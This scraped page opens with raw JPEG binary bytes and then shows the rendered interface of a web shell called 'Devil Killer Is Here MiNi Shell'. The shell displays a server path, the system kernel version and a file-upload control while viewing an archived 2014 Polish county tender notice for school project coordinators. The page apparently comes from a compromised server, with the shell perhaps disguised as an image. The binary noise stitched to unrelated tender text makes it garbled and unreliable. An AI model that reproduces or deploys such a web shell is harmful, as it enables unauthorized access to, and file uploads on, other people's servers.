JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140318/57419-N-2014.html

<p class="kh_header"><b>Rypin: Pełnienie funkcji koordynatorów szkolnych w ramach projektów Dobry Zawód - Lepszy Start i Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region oraz koordynatora  i specjalisty ds. monitoringu projektu DIAGNOZA - DOSKONALENIE - ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego</b><br>
<b>Numer ogłoszenia: 57419 - 2014; data zamieszczenia: 18.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Rypiński , ul. Warszawska 38, 87-500 Rypin, woj. kujawsko-pomorskie, tel. 54 2802432, faks 54 2802549.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatrypinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatorów szkolnych w ramach projektów Dobry Zawód - Lepszy Start i Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region oraz koordynatora  i specjalisty ds. monitoringu projektu DIAGNOZA - DOSKONALENIE - ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest :
1.1. pełnienie funkcji koordynatorów szkolnych w ramach projektu Dobry Zawód - Lepszy Start Nr WND-POKL.09.02.00-04-006/13 - 4 koordynatorów szkolnych w szkołach prowadzących kształcenie zawodowe dla których organem prowadzącym jest Powiat Rypiński,  koordynatora w Zespole Szkół Miejskich w Liceum Plastycznym dla którego organem prowadzącym jest Miasto Rypin uczestniczących w projekcie, 
1.2. pełnienie funkcji koordynatorów szkolnych w ramach projektu Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region Nr WND-POKL.09.01.02-04-067/13  - 3 koordynatorów szkolnych w szkołach prowadzących kształcenie ogólne dla których organem prowadzącym jest Powiat Rypiński, uczestniczących w projekcie,
1.3. pełnienie funkcji koordynatora   i specjalisty ds. monitoringu projektu DIAGNOZA - DOSKONALENIE - ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego Nr WND-POKL.03.05.00-00-087/13 realizowanego przez Powiat Rypiński. 
2. Projekt Dobry zawód - Lepszy Start jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Projekt Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji  w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Projekt DIAGNOZA - DOSKONALENIE - ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego.   jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość w systemie oświaty, Działanie 3.5  Kompleksowe wspomaganie rozwoju szkół.
2. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - CZĘŚCI OD 1 DO 8
I.	Szczegółowy opis przedmiotu zamówienia:
1) Przedmiotem zamówienia jest pełnienie funkcji koordynatorów szkolnych w ramach projektu Dobry Zawód - Lepszy Start Nr WND-POKL.09.02.00-04-006/13 w okresie od dnia podpisania umowy  do 30.09.2015r. - 4 koordynatorów szkolnych w szkołach prowadzących kształcenie zawodowe dla których organem prowadzącym jest Powiat Rypiński oraz  koordynatora w Zespole Szkół Miejskich w Liceum Plastycznym dla którego organem prowadzącym jest Miasto Rypin uczestniczących w projekcie oraz pełnienie funkcji koordynatorów szkolnych w ramach projektu Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region Nr WND-POKL.09.01.02-04-067/13 w okresie od dnia podpisania umowy do 30.06.2014 r. oraz od 1.09.2014 r. do 30.06.2015 r.  (3 koordynatorów szkolnych) w szkołach prowadzących kształcenie ogólne dla których organem prowadzącym jest Powiat Rypiński, uczestniczących w projekcie.
2) Projekt Dobry zawód - Lepszy Start jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, natomiast projekt Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
3) Zakres obowiązków Koordynatora szkolnego zatrudnionego w ramach projektu Dobry Zawód - Lepszy Start oraz projektu Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region obejmuje w szczególności:
a) merytoryczną i organizacyjną współpracę z nauczycielami przy przygotowywaniu zajęć pozalekcyjnych wynikających z programu rozwojowego szkoły objętej wsparciem,
b) zapoznanie się i działanie zgodnie z zasadami i wymogami projektu określonymi w dokumentacji konkursowej dla konkursu 4/POKL/9.2/2013, (dotyczy części 1-5) oraz dokumentacji konkursowej dla konkursu 3/POKL/9.1.2/2013 (dotyczy części 6-8), które zamieszczone są na stronie internetowej Instytucji Pośredniczącej www.mojregion.eu,
c) przygotowanie i realizację rekrutacji uczestników projektu (zebranie regulaminów rekrutacji), udział w pracach komisji rekrutacyjnej, tworzenie protokołów z prac komisji rekrutacyjnej, informowanie uczestników o zakwalifikowaniu się do projektu;
d) sporządzenie i zebranie podpisanych deklaracji uczestnictwa w projekcie oraz oświadczeń dot. wyrażenia zgody na przetwarzanie danych osobowych uczniów,
e) stworzenie i aktualizację planu zajęć pozalekcyjnych,
f) bieżącą weryfikację zajęć pozalekcyjnych, w tym uczestnictwo uczniów w wybranych zajęciach,
g) nadzorowanie dokumentacji szkolnej w ramach projektu (dzienniki zajęć pozalekcyjnych, listy obecności itp.),
h) wstępne zatwierdzanie programów nauczania, weryfikację  informacji uzyskanych od nauczycieli z realizacji zajęć pod względem merytorycznym, jakościowym i statystycznym, a także raportów z ewaluacji postępów,
i) zatwierdzanie, przepracowanych godzin nauczycieli na rachunku wystawionym przez nauczyciela,
j) promocję projektu zgodnie z wytycznymi POKL,
k) nadzór nad osiągnięciem wskaźników ilościowych i jakościowych zgodnie z wnioskiem o dofinansowanie projektu,
l) przestrzeganie przepisów o ochronie danych osobowych w zakresie danych przetwarzanych w ramach projektu,
m) tworzenie opisów przedmiotów zamówienia w zakresie zakupów w danej szkole,
n) bieżącą współpracę z koordynatorem projektu/menadżerem , asystentem koordynatora w zakresie realizacji projektu,
o) udział w spotkaniach związanych z realizacją projektu,
p) Wykonawca/osoba oznaczona przez Wykonawcę do realizacji zadań musi być dyspozycyjna /dostępność czasowa/, tj. możliwość stawiania się każdego dnia w okresie prowadzenia zajęć projektowych (wynikających ze specyfiki zakresu obowiązków: dostępność dla  uczniów - uczestników projektu, rodziców uczniów, prowadzących zajęcia projektowe) oraz realizować zadania zgodnie z harmonogramem projektu, jak również stawiać się w danej szkole (zależnym od części zamówienia) na każde wezwanie Koordynatora projektu/Menadżera projektu,
q) wsparcie zadań związanych z organizacją i kontrolą przebiegu staży w zakładach pracy.
II.	Przedmiot zamówienia został podzielony na 8 części:
Część 1.  Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 2 im. Unii Europejskiej w Rypinie w projekcie Dobry zawód - Lepszy Start
Część 2. Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 3 im. Bogdana Chełmickiego w Rypinie  w projekcie Dobry zawód - Lepszy Start
Część 3.  Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 4 im. Ziemi Dobrzyńskiej w Nadrożu  w projekcie Dobry zawód - Lepszy Start
Część 4. Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 5 im. Ks. Jana Twardowskiego w Rypinie  w projekcie Dobry zawód - Lepszy Start
Część 5. Pełnienie funkcji koordynatora szkolnego w Liceum Plastycznym wchodzącym w skład Zespołu Szkół Miejskich im. Józefa Wybickiego w Rypinie  w projekcie Dobry zawód - Lepszy Start
Część 6. Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 1 im. Ks. Czesława Lissowskiego w Rypinie w projekcie Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region
Część 7. Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 2 im. Unii Europejskiej w Rypinie  Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region
Część 8.  Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 4 im. Ziemi Dobrzyńskiej w Nadrożu  Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region
III.	Szacunkowy podział godzin/miesięcznie: część 1 - 25, część 2 - 25, część 3 - 25, część 4 - 10, część 5 - 20, część 6 - 30, część 7 - 20, część 8 - 20.
IV.	Informacje dodatkowe:
1. Koordynator szkolny danej szkoły będzie zatrudniony na podstawie umowy zlecenia.
2. Wykonawca realizujący przedmiot zamówienia nie może być zatrudniony (dot. wyłącznie osób zatrudnionych w instytucjach uczestniczących w realizacji POKL na podstawie stosunku pracy) w instytucjach uczestniczących w realizacji Programu Operacyjnego Kapitał Ludzki tj. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej, Regionalnych Ośrodkach EFS, Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba że nie zachodzi konflikt interesów ani podwójne  finansowanie.
3. W przypadku zaangażowania Wykonawcy realizującego przedmiot zamówienia w więcej niż jednym projekcie w ramach Narodowych Strategicznych Ram Odniesienia, obciążenie wynikające z pracy w kilku projektach nie może wykluczać prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach realizacji niniejszego przedmiotu zamówienia, łącznie zaangażowanie w realizację zadań projektowych nie może przekroczyć 240 godzin miesięcznie.
4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, wraz z podpisaniem umowy złoży oświadczenie o zaangażowaniu w innych projektach współfinansowanych ze środków Unii Europejskiej oraz niewystępowaniu konfliktu interesów oraz podwójnego finansowania w przypadku zatrudnienia w instytucjach uczestniczących w realizacji POKL.
5. Rozliczenie usługi będzie na koniec każdego miesiąca na podstawie wystawionych faktur VAT/rachunków wraz z kartą pracy.
3. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - CZĘŚCI 9, 10
I.	Szczegółowy opis przedmiotu zamówienia:
1.	Przedmiotem zamówienia jest pełnienie funkcji:
		1)  koordynatora  
		2) specjalisty ds. monitoringu 
	projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie 	rozwoju szkół i przedszkoli powiatu rypińskiego Nr WND-POKL.03.05.00-00-087/13 w okresie od dnia podpisania umowy do 30.09.2015r. realizowanego przez Powiat Rypiński.  
2. Projekt DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego.   jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość w systemie oświaty, Działanie 3.5  Kompleksowe wspomaganie rozwoju szkół.
Opis przedmiotu zamówienia do części 9  
Koordynator projektu podejmuje wiążące decyzje w projekcie a pozostali członkowie zespołu mu podlegają Zakres obowiązków Koordynatora projektu zatrudnionego w ramach projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego.   obejmuje w szczególności:
a) zapoznanie się i działanie zgodnie z zasadami i wymogami projektu  określonymi  w dokumentacji konkursowej dla konkursu 1/POKL/3.5/2012, które zamieszczone są na stronie internetowej Instytucji Pośredniczącej ,
b) podejmowanie wszelkich działań w zgodzie  z przepisami krajowymi i wspólnotowymi wymienionymi na str. 5 Poradnika dla beneficjenta w/w konkursu, 
c) koordynowanie prawidłowej realizacji projektu w tym terminowe i właściwe realizowanie całości projektu poprzez zarządzanie wszystkimi przedsięwzięciami projektu  na wszystkich jego etapach,
d) kierowanie wykonaniem projektu w formie nadzoru logistycznego zgodnie    z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i EFS,
e) nadzorowanie nad monitoringiem, ewaluacją projektu oraz jego promocją i informacją,
f) akceptowanie wszystkich narzędzi wykorzystywanych w projekcie,
g) akceptowanie korespondencji związanej z projektem do Instytucji Pośredniczącej;
h) współpraca z PORE w zakresie realizacji zadań,
i) przygotowywanie  merytorycznej części   wniosków o płatność,
j) nadzór nad prowadzeniem bazy PEFS w tym weryfikowanie  i akceptacja zbiorczych arkuszy PEFS,
k) przygotowanie rekrutacji szkół/przedszkoli oraz nauczycieli do projektu,
l) opracowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu,
m) przygotowanie upoważnień do przetwarzania danych osobowych dla personelu projektu oraz zgłoszenie ich do rejestru upoważnień obowiązujących w Starostwie Powiatowym,
n) przestrzeganie procedur związanych z ochroną danych osobowych uczestników projektu, personelu,
o) zapewnienie właściwego przepływu informacji pomiędzy pracownikami projektu,
p) informowanie Starosty co najmniej raz w miesiącu o postępie w  realizacji projektu oraz informowanie Starosty o wszystkich zaistniałych problemach w realizacji projektu,
q) utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej,
r) terminowe przesyłanie wszystkich wymaganych dokumentów i sprawozdań oraz innych obowiązujących dokumentów,
s) poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu,
t) udział w szkoleniach organizowanych przez ORE z zakresu realizacji projektu,
u) organizowanie spotkań monitorujących z pracownikami projektu oraz dyrektorami szkół/przedszkoli uczestniczącymi w projekcie,
v) zgłoszenie do ORE w Warszawie wszelkich zmian w realizacji w budżecie projektu, przygotowywanie formularzy zmian merytorycznych i budżetowych,
w) przygotowanie opisu przedmiotu zamówienia w części dotyczącej usług i oszacowania wartości zamówienia,
x) śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w celu zapewnienia zgodności projektu z wytycznymi, jak również prawem RP i UE;
y) zatwierdzanie pod względem merytorycznym dokumentów, które powstały   w projekcie;
z) inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej, a zlecone przez Zamawiającego.
Opis przedmiotu zamówienia do części 10
Zakres obowiązków specjalisty ds. monitoringu projektu zatrudnionego w ramach projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego.   obejmuje w szczególności:
a) zapoznanie się i działanie zgodnie z zasadami i wymogami projektu  określonymi w dokumentacji konkursowej dla konkursu 1/POKL/3.5/2012, które zamieszczone są na stronie internetowej Instytucji Pośredniczącej,
b) monitorowanie na bieżąco realizacji zadań związanych z projektem zgodnie z harmonogramem, budżetem i zapisami zawartymi we wniosku w ramach monitoringu i ewaluacji projektu,
c) wdrażanie założonych działań związanych z procesem ewaluacji i monitorowania zadań realizowanych w ramach projektu,
d) współpraca z personelem projektu w zakresie dostarczenia danych wymaganych do monitorowania i ewaluacji, 
e) współpraca w tworzeniu i redakcji raportów ewaluacyjnych z koordynatorem, PORE, SORE i koordynatorami sieci oraz  w zakresie wskaźników osiąganych w projekcie,
f) przeprowadzenie badań w miejscu prac grup roboczych (fizyczna obserwacja udzielanego wsparcia w miejscu toczących się prac),
g) badania ewaluacyjne w obszarze zaplanowanego wsparcia,
h) sporządzanie raportów w określonych terminach sprawozdawczych oraz raportów końcowych wraz z wnioskami,
i) nadzorowanie terminowości przesyłania wszystkich wymaganych dokumentów i informacji na potrzeby monitoringu i ewaluacji projektu,
j) monitoring w 26 jednostkach.
II.	Przedmiot zamówienia został podzielony na 2 części:
Część 9.  Pełnienie funkcji koordynatora projektu
Część 10. Pełnienie funkcji specjalisty ds. monitoringu
III.	Szacunkowy podział godzin/miesięcznie: część 9 - 75, część 10 - 40.
IV.	Informacje dodatkowe:
1. Koordynator projektu oraz specjalista ds. monitoringu będzie zatrudniony na podstawie umowy zlecenia.
2. Wykonawca realizujący przedmiot zamówienia nie może być zatrudniony (dot. wyłącznie osób zatrudnionych w instytucjach uczestniczących w realizacji POKL na podstawie stosunku pracy) w instytucjach uczestniczących w realizacji Programu Operacyjnego Kapitał Ludzki tj. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej, Regionalnych Ośrodkach EFS, Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba że nie zachodzi konflikt interesów ani podwójne  finansowanie.
3. W przypadku zaangażowania Wykonawcy realizującego przedmiot zamówienia w więcej niż jednym projekcie w ramach Narodowych Strategicznych Ram Odniesienia, obciążenie wynikające z pracy w kilku projektach nie może wykluczać prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach realizacji niniejszego przedmiotu zamówienia, łącznie zaangażowanie w realizację zadań projektowych nie może przekroczyć 240 godzin miesięcznie.
4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, wraz    z podpisaniem umowy złoży oświadczenie o zaangażowaniu w innych projektach współfinansowanych ze środków Unii Europejskiej oraz niewystępowaniu konfliktu interesów oraz podwójnego finansowania w przypadku zatrudnienia w instytucjach uczestniczących w realizacji POKL.
5. Rozliczenie usługi będzie na koniec każdego miesiąca na podstawie wystawionych faktur VAT/rachunków wraz z karta pracy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2, 79.42.12.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował:
1. w przypadku składania oferty na część 1, 2, 3, 4, 5, 6, 7, 8 zamówienia -  co najmniej jedną osobą, która łącznie spełnia nw. warunki: 
a) posiada wykształcenie wyższe pedagogiczne lub wykształcenie wyższe z przygotowaniem pedagogicznym,
b) posiada co najmniej trzyletnie doświadczenie w pracy w szkole ponadgimnazjalnej na stanowisku kierowniczym,
c)  posiada doświadczenie w realizacji co najmniej dwóch projektów w ramach Programu Operacyjnego Kapitał Ludzki, gdzie beneficjentem była jednostka samorządu terytorialnego. Za doświadczenie  w realizacji projektu w ramach Programu Operacyjnego Kapitał Ludzki Zamawiający uzna udział w pracach Zespołu Zarządzającego lub/i nadzór nad realizacją projektu,
d) nie była skazana prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
2. w przypadku składania oferty na część 9 zamówienia -  co najmniej jedną osobą, która łącznie spełnia nw. warunki:
a)	posiada wykształcenie wyższe pedagogiczne lub wyższe z przygotowaniem pedagogicznym, 
b)	ukończyła studia podyplomowe lub kursy potwierdzające kwalifikacje  z zakresu zarządzania oświatą, 
c)	ukończyła studia podyplomowe lub kursy potwierdzające kwalifikacje w zakresie  kontroli bądź audytu,
d)	posiada doświadczenie zawodowe w oświacie na stanowiskach kierowniczych min. 5 lat,
e)	posiada doświadczenie zawodowe w samorządzie min. 3 lata (na stanowiskach związanych z oświatą i  kontrolą),
f)	posiada doświadczenie zawodowe w instytucjach zajmujących się doskonaleniem zawodowym nauczycieli,
g)	posiada doświadczenie w pracy zespołu zarządzającego w co najmniej jednym projekcie PO KL z priorytetu III,
h)	posiada doświadczenie w koordynowaniu co najmniej trzech projektów PO KL z priorytetu IX,
i)	nie była skazana prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
3. w przypadku składania oferty na część 10 zamówienia -  co najmniej jedną osobą, która łącznie spełnia nw. warunki:
a)	posiada wykształcenie wyższe, 
b)	posiada doświadczenie zawodowe w administracji oświatowej lub jednostkach samorządu terytorialnego   min. 5 lat,
c)	posiada doświadczenie w pracy zespołu zarządzającego w co najmniej jednym projekcie PO KL z priorytetu III i co najmniej jednym projekcie PO KL z priorytetu IX,
d)	ukończyła co najmniej jedno szkolenie w zakresie ewaluacji projektów PO KL,
e)	nie była skazana prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie wykazał/ nie wykazał, na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę wraz z ofertą, wymienionych i opisanych w rozdziale 5 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
